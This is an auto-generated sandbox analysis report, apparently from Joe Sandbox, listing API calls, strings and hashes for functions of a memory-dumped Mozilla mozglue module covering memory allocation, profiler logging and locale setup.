                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AllocVirtual
                                                                                                      • String ID: : (malloc) Error in VirtualFree()$<jemalloc>
                                                                                                      • API String ID: 4275171209-2186867486
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                        • Part of subcall function 6CF9F100: LoadLibraryW.KERNEL32(shell32,?,6D00D020), ref: 6CF9F122
                                                                                                        • Part of subcall function 6CF9F100: GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 6CF9F132
                                                                                                      • moz_xmalloc.MOZGLUE(00000012), ref: 6CF9ED50
                                                                                                      • wcslen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CF9EDAC
                                                                                                      • wcslen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,\Mozilla\Firefox\SkeletonUILock-,00000020,?,00000000), ref: 6CF9EDCC
                                                                                                      • CreateFileW.KERNEL32 ref: 6CF9EE08
                                                                                                      • free.MOZGLUE(00000000), ref: 6CF9EE27
                                                                                                      • free.MOZGLUE(?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 6CF9EE32
                                                                                                        • Part of subcall function 6CF9EB90: moz_xmalloc.MOZGLUE(00000104), ref: 6CF9EBB5
                                                                                                        • Part of subcall function 6CF9EB90: memset.VCRUNTIME140(00000000,00000000,00000104,?,?,6CFCD7F3), ref: 6CF9EBC3
                                                                                                        • Part of subcall function 6CF9EB90: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,?,?,?,?,?,?,6CFCD7F3), ref: 6CF9EBD6
                                                                                                      Strings
                                                                                                      • \Mozilla\Firefox\SkeletonUILock-, xrefs: 6CF9EDC1
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Filefreemoz_xmallocwcslen$AddressCreateLibraryLoadModuleNameProcmemset
                                                                                                      • String ID: \Mozilla\Firefox\SkeletonUILock-
                                                                                                      • API String ID: 1980384892-344433685
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • ?HandleSpecialValues@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@@Z.MOZGLUE ref: 6D00A565
                                                                                                        • Part of subcall function 6D00A470: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6D00A4BE
                                                                                                        • Part of subcall function 6D00A470: memcpy.VCRUNTIME140(?,?,00000000), ref: 6D00A4D6
                                                                                                      • ?CreateExponentialRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHPAVStringBuilder@2@@Z.MOZGLUE ref: 6D00A65B
                                                                                                      • ?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6D00A6B6
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: String$Double$Converter@double_conversion@@$Builder@2@@$Ascii@CreateDtoaExponentialHandleMode@12@Representation@SpecialValues@memcpystrlen
                                                                                                      • String ID: 0$z
                                                                                                      • API String ID: 310210123-2584888582
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                        • Part of subcall function 6CFCAB89: EnterCriticalSection.KERNEL32(6D01E370,?,?,?,6CF934DE,6D01F6CC,?,?,?,?,?,?,?,6CF93284), ref: 6CFCAB94
                                                                                                        • Part of subcall function 6CFCAB89: LeaveCriticalSection.KERNEL32(6D01E370,?,6CF934DE,6D01F6CC,?,?,?,?,?,?,?,6CF93284,?,?,6CFB56F6), ref: 6CFCABD1
                                                                                                      • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6CFA4A68), ref: 6CFD945E
                                                                                                      • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6CFD9470
                                                                                                      • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6CFD9482
                                                                                                      • __Init_thread_footer.LIBCMT ref: 6CFD949F
                                                                                                      Strings
                                                                                                      • MOZ_BASE_PROFILER_LOGGING, xrefs: 6CFD947D
                                                                                                      • MOZ_BASE_PROFILER_DEBUG_LOGGING, xrefs: 6CFD946B
                                                                                                      • MOZ_BASE_PROFILER_VERBOSE_LOGGING, xrefs: 6CFD9459
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: getenv$CriticalSection$EnterInit_thread_footerLeave
                                                                                                      • String ID: MOZ_BASE_PROFILER_DEBUG_LOGGING$MOZ_BASE_PROFILER_LOGGING$MOZ_BASE_PROFILER_VERBOSE_LOGGING
                                                                                                      • API String ID: 4042361484-1628757462
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • moz_xmalloc.MOZGLUE(?,?,?,?,6CF9B61E,?,?,?,?,?,00000000), ref: 6CF9B6AC
                                                                                                        • Part of subcall function 6CFACA10: malloc.MOZGLUE(?), ref: 6CFACA26
                                                                                                      • memcpy.VCRUNTIME140(00000000,?,?,?,?,?,6CF9B61E,?,?,?,?,?,00000000), ref: 6CF9B6D1
                                                                                                      • memcpy.VCRUNTIME140(00000000,?,?,?,?,?,?,?,?,6CF9B61E,?,?,?,?,?,00000000), ref: 6CF9B6E3
                                                                                                      • memcpy.VCRUNTIME140(00000000,?,?,?,?,?,6CF9B61E,?,?,?,?,?,00000000), ref: 6CF9B70B
                                                                                                      • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,6CF9B61E,?,?,?,?,?,00000000), ref: 6CF9B71D
                                                                                                      • free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,6CF9B61E), ref: 6CF9B73F
                                                                                                      • moz_xmalloc.MOZGLUE(80000023,?,?,?,6CF9B61E,?,?,?,?,?,00000000), ref: 6CF9B760
                                                                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,6CF9B61E,?,?,?,?,?,00000000), ref: 6CF9B79A
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memcpy$moz_xmalloc$_invalid_parameter_noinfo_noreturnfreemalloc
                                                                                                      • String ID:
                                                                                                      • API String ID: 1394714614-0
                                                                                                      • Opcode ID: 62c69e3623bc97325b907c25529fe2be5517bd46b35e66021820f06d6848980a
                                                                                                      • Instruction ID: ebfe7d6e519a39772da5f2af753a716ed1230a8a96da0ff16caa7c4e0f24ea3a
                                                                                                      • Opcode Fuzzy Hash: 62c69e3623bc97325b907c25529fe2be5517bd46b35e66021820f06d6848980a
                                                                                                      • Instruction Fuzzy Hash: 9E41A5B2D041159FEB14DF68DC806AFB7B9AF45324F250A69E825E7790E731E90087E2
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • ?classic@locale@std@@SAABV12@XZ.MSVCP140 ref: 6D00B5B9
                                                                                                      • ??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000), ref: 6D00B5C5
                                                                                                      • ??Bid@locale@std@@QAEIXZ.MSVCP140 ref: 6D00B5DA
                                                                                                      • ??1_Lockit@std@@QAE@XZ.MSVCP140(00000000), ref: 6D00B5F4
                                                                                                      • __Init_thread_footer.LIBCMT ref: 6D00B605
                                                                                                      • ?_Getcat@?$ctype@D@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(00000000,?,00000000), ref: 6D00B61F
                                                                                                      • std::_Facet_Register.LIBCPMT ref: 6D00B631
                                                                                                      • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6D00B655
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Lockit@std@@$??0_??1_?classic@locale@std@@Bid@locale@std@@D@std@@Facet_Getcat@?$ctype@Init_thread_footerRegisterV12@V42@@Vfacet@locale@2@abortstd::_
                                                                                                      • String ID:
                                                                                                      • API String ID: 1276798925-0
                                                                                                      • Opcode ID: f5279710ad21788d7c095528967833cad7cb8a591587e1b6a71d0d7c9bb25f84
                                                                                                      • Instruction ID: 00abf7be7ca2436c7b1db7f019a02e8f2bb7fcd381698893bcdd7af2d6ae4459
                                                                                                      • Opcode Fuzzy Hash: f5279710ad21788d7c095528967833cad7cb8a591587e1b6a71d0d7c9bb25f84
                                                                                                      • Instruction Fuzzy Hash: 1D319772E00605DBDB04DFA9CC55BBEBBB6FF86321F150519D52697340DB30A806CB92
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6CFE1D0F
                                                                                                      • AcquireSRWLockExclusive.KERNEL32(?,?,6CFE1BE3,?,?,6CFE1D96,00000000), ref: 6CFE1D18
                                                                                                      • ReleaseSRWLockExclusive.KERNEL32(?,?,6CFE1BE3,?,?,6CFE1D96,00000000), ref: 6CFE1D4C
                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6CFE1DB7
                                                                                                      • AcquireSRWLockExclusive.KERNEL32(?), ref: 6CFE1DC0
                                                                                                      • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6CFE1DDA
                                                                                                        • Part of subcall function 6CFE1EF0: GetCurrentThreadId.KERNEL32 ref: 6CFE1F03
                                                                                                        • Part of subcall function 6CFE1EF0: AcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,6CFE1DF2,00000000,00000000), ref: 6CFE1F0C
                                                                                                        • Part of subcall function 6CFE1EF0: ReleaseSRWLockExclusive.KERNEL32 ref: 6CFE1F20
                                                                                                      • moz_xmalloc.MOZGLUE(00000008,00000000,00000000), ref: 6CFE1DF4
                                                                                                        • Part of subcall function 6CFACA10: malloc.MOZGLUE(?), ref: 6CFACA26
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ExclusiveLock$AcquireCurrentReleaseThread$mallocmoz_xmalloc
                                                                                                      • String ID:
                                                                                                      • API String ID: 1880959753-0
                                                                                                      • Opcode ID: 18689d2f04368fa1b31bf65ee2d649e86482c65a8677ed6c464ef0bac92d63d8
                                                                                                      • Instruction ID: bdc83ce7fc79c8a4e4ad3a5a1be315c35064dac5941fae6948a7508d6d83ab94
                                                                                                      • Opcode Fuzzy Hash: 18689d2f04368fa1b31bf65ee2d649e86482c65a8677ed6c464ef0bac92d63d8
                                                                                                      • Instruction Fuzzy Hash: 9C418A75200700AFCB14CF69C889B5ABBF9FB49314F10842DE95A87B42CB71E814CB91
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6CFD84F3
                                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6CFD850A
                                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6CFD851E
                                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6CFD855B
                                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6CFD856F
                                                                                                      • ??1UniqueJSONStrings@baseprofiler@mozilla@@QAE@XZ.MOZGLUE(?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6CFD85AC
                                                                                                        • Part of subcall function 6CFD7670: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,6CFD85B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6CFD767F
                                                                                                        • Part of subcall function 6CFD7670: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,6CFD85B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6CFD7693
                                                                                                        • Part of subcall function 6CFD7670: free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,6CFD85B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6CFD76A7
                                                                                                      • free.MOZGLUE(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6CFD85B2
                                                                                                        • Part of subcall function 6CFB5E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6CFB5EDB
                                                                                                        • Part of subcall function 6CFB5E90: memset.VCRUNTIME140(6CFF7765,000000E5,55CCCCCC), ref: 6CFB5F27
                                                                                                        • Part of subcall function 6CFB5E90: LeaveCriticalSection.KERNEL32(?), ref: 6CFB5FB2
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: free$CriticalSection$EnterLeaveStrings@baseprofiler@mozilla@@Uniquememset
                                                                                                      • String ID:
                                                                                                      • API String ID: 2666944752-0
                                                                                                      • Opcode ID: e303e2ad474659a44642424c9c0e8628654736e7ec0f2a8b55d3cb8818db4b7e
                                                                                                      • Instruction ID: 09f7ccc54a93fc5f31837b9f01ef994813f3bfd66baaef31686a9bb4a318d863
                                                                                                      • Opcode Fuzzy Hash: e303e2ad474659a44642424c9c0e8628654736e7ec0f2a8b55d3cb8818db4b7e
                                                                                                      • Instruction Fuzzy Hash: 7021AE742007019FDB14CB69C888B6AB7B5AF8431DF29082DE55BC3B41DB31F948CB95
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • memset.VCRUNTIME140(?,00000000,00000114), ref: 6CFA1699
                                                                                                      • VerSetConditionMask.NTDLL ref: 6CFA16CB
                                                                                                      • VerSetConditionMask.NTDLL ref: 6CFA16D7
                                                                                                      • VerSetConditionMask.NTDLL ref: 6CFA16DE
                                                                                                      • VerSetConditionMask.NTDLL ref: 6CFA16E5
                                                                                                      • VerSetConditionMask.NTDLL ref: 6CFA16EC
                                                                                                      • VerifyVersionInfoW.KERNEL32(?,00000037,00000000), ref: 6CFA16F9
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ConditionMask$InfoVerifyVersionmemset
                                                                                                      • String ID:
                                                                                                      • API String ID: 375572348-0
                                                                                                      • Opcode ID: d35146eefd31110ae9b076250c85c14ff9c98e37ad3bb6259bba14a60ced0cf0
                                                                                                      • Instruction ID: 71ca97890a1cd70fbfd406ee924f2da6276f9d82f6bf6bd6ae8ec10feeae15dd
                                                                                                      • Opcode Fuzzy Hash: d35146eefd31110ae9b076250c85c14ff9c98e37ad3bb6259bba14a60ced0cf0
                                                                                                      • Instruction Fuzzy Hash: A421D2B1740208ABFB115BA88C86FBBB37CEFC6704F054528F6459B690C7749D5486A2
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                        • Part of subcall function 6CFCCBE8: GetCurrentProcess.KERNEL32(?,6CF931A7), ref: 6CFCCBF1
                                                                                                        • Part of subcall function 6CFCCBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6CF931A7), ref: 6CFCCBFA
                                                                                                        • Part of subcall function 6CFD9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6CFA4A68), ref: 6CFD945E
                                                                                                        • Part of subcall function 6CFD9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6CFD9470
                                                                                                        • Part of subcall function 6CFD9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6CFD9482
                                                                                                        • Part of subcall function 6CFD9420: __Init_thread_footer.LIBCMT ref: 6CFD949F
                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6CFDF619
                                                                                                      • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000,?,6CFDF598), ref: 6CFDF621
                                                                                                        • Part of subcall function 6CFD94D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6CFD94EE
                                                                                                        • Part of subcall function 6CFD94D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6CFD9508
                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6CFDF637
                                                                                                      • AcquireSRWLockExclusive.KERNEL32(6D01F4B8,?,?,00000000,?,6CFDF598), ref: 6CFDF645
                                                                                                      • ReleaseSRWLockExclusive.KERNEL32(6D01F4B8,?,?,00000000,?,6CFDF598), ref: 6CFDF663
                                                                                                      Strings
                                                                                                      • [D %d/%d] profiler_remove_sampled_counter(%s), xrefs: 6CFDF62A
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Currentgetenv$ExclusiveLockProcessThread$AcquireInit_thread_footerReleaseTerminate__acrt_iob_func__stdio_common_vfprintf_getpid
                                                                                                      • String ID: [D %d/%d] profiler_remove_sampled_counter(%s)
                                                                                                      • API String ID: 1579816589-753366533
                                                                                                      • Opcode ID: ba93f555233d4c134be7e9a7f06c08e0a96d396b584ef2d572ec111a2a2e1bca
                                                                                                      • Instruction ID: df9e5b67eda628197ce95200c89f11bb9a25fa40e7b7282b6fbcf4eb8c18da11
                                                                                                      • Opcode Fuzzy Hash: ba93f555233d4c134be7e9a7f06c08e0a96d396b584ef2d572ec111a2a2e1bca
                                                                                                      • Instruction Fuzzy Hash: 8811E372205205ABDA44AFD9CC49FA57BBDFB87358B150019EA1683F01CB72B821CBA1
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                        • Part of subcall function 6CFCAB89: EnterCriticalSection.KERNEL32(6D01E370,?,?,?,6CF934DE,6D01F6CC,?,?,?,?,?,?,?,6CF93284), ref: 6CFCAB94
                                                                                                        • Part of subcall function 6CFCAB89: LeaveCriticalSection.KERNEL32(6D01E370,?,6CF934DE,6D01F6CC,?,?,?,?,?,?,?,6CF93284,?,?,6CFB56F6), ref: 6CFCABD1
                                                                                                      • LoadLibraryW.KERNEL32(combase.dll,00000000,?,6CFCD9F0,00000000), ref: 6CFA0F1D
                                                                                                      • GetProcAddress.KERNEL32(00000000,CoInitializeEx), ref: 6CFA0F3C
                                                                                                      • __Init_thread_footer.LIBCMT ref: 6CFA0F50
                                                                                                      • FreeLibrary.KERNEL32(?,6CFCD9F0,00000000), ref: 6CFA0F86
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CriticalLibrarySection$AddressEnterFreeInit_thread_footerLeaveLoadProc
                                                                                                      • String ID: CoInitializeEx$combase.dll
                                                                                                      • API String ID: 4190559335-2063391169
                                                                                                      • Opcode ID: 36a82da8c9dee69272e30c7178bb77a7e217547ff54a2306614539d9da3f9591
                                                                                                      • Instruction ID: 5c193eef70d5fe135901387cc17ba495690b0e8ed3339153463d1ee180855d7d
                                                                                                      • Opcode Fuzzy Hash: 36a82da8c9dee69272e30c7178bb77a7e217547ff54a2306614539d9da3f9591
                                                                                                      • Instruction Fuzzy Hash: 87118276509241DBEF008FD5DD09F5A7FBDFB8F325F004229EA2AA2781D770A406CA56
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                        • Part of subcall function 6CFD9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6CFA4A68), ref: 6CFD945E
                                                                                                        • Part of subcall function 6CFD9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6CFD9470
                                                                                                        • Part of subcall function 6CFD9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6CFD9482
                                                                                                        • Part of subcall function 6CFD9420: __Init_thread_footer.LIBCMT ref: 6CFD949F
                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6CFDF559
                                                                                                      • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CFDF561
                                                                                                        • Part of subcall function 6CFD94D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6CFD94EE
                                                                                                        • Part of subcall function 6CFD94D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6CFD9508
                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6CFDF577
                                                                                                      • AcquireSRWLockExclusive.KERNEL32(6D01F4B8), ref: 6CFDF585
                                                                                                      • ReleaseSRWLockExclusive.KERNEL32(6D01F4B8), ref: 6CFDF5A3
                                                                                                      Strings
                                                                                                      • [D %d/%d] profiler_add_sampled_counter(%s), xrefs: 6CFDF56A
                                                                                                      • [I %d/%d] profiler_resume_sampling, xrefs: 6CFDF499
                                                                                                      • [I %d/%d] profiler_pause_sampling, xrefs: 6CFDF3A8
                                                                                                      • [I %d/%d] profiler_resume, xrefs: 6CFDF239
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmp
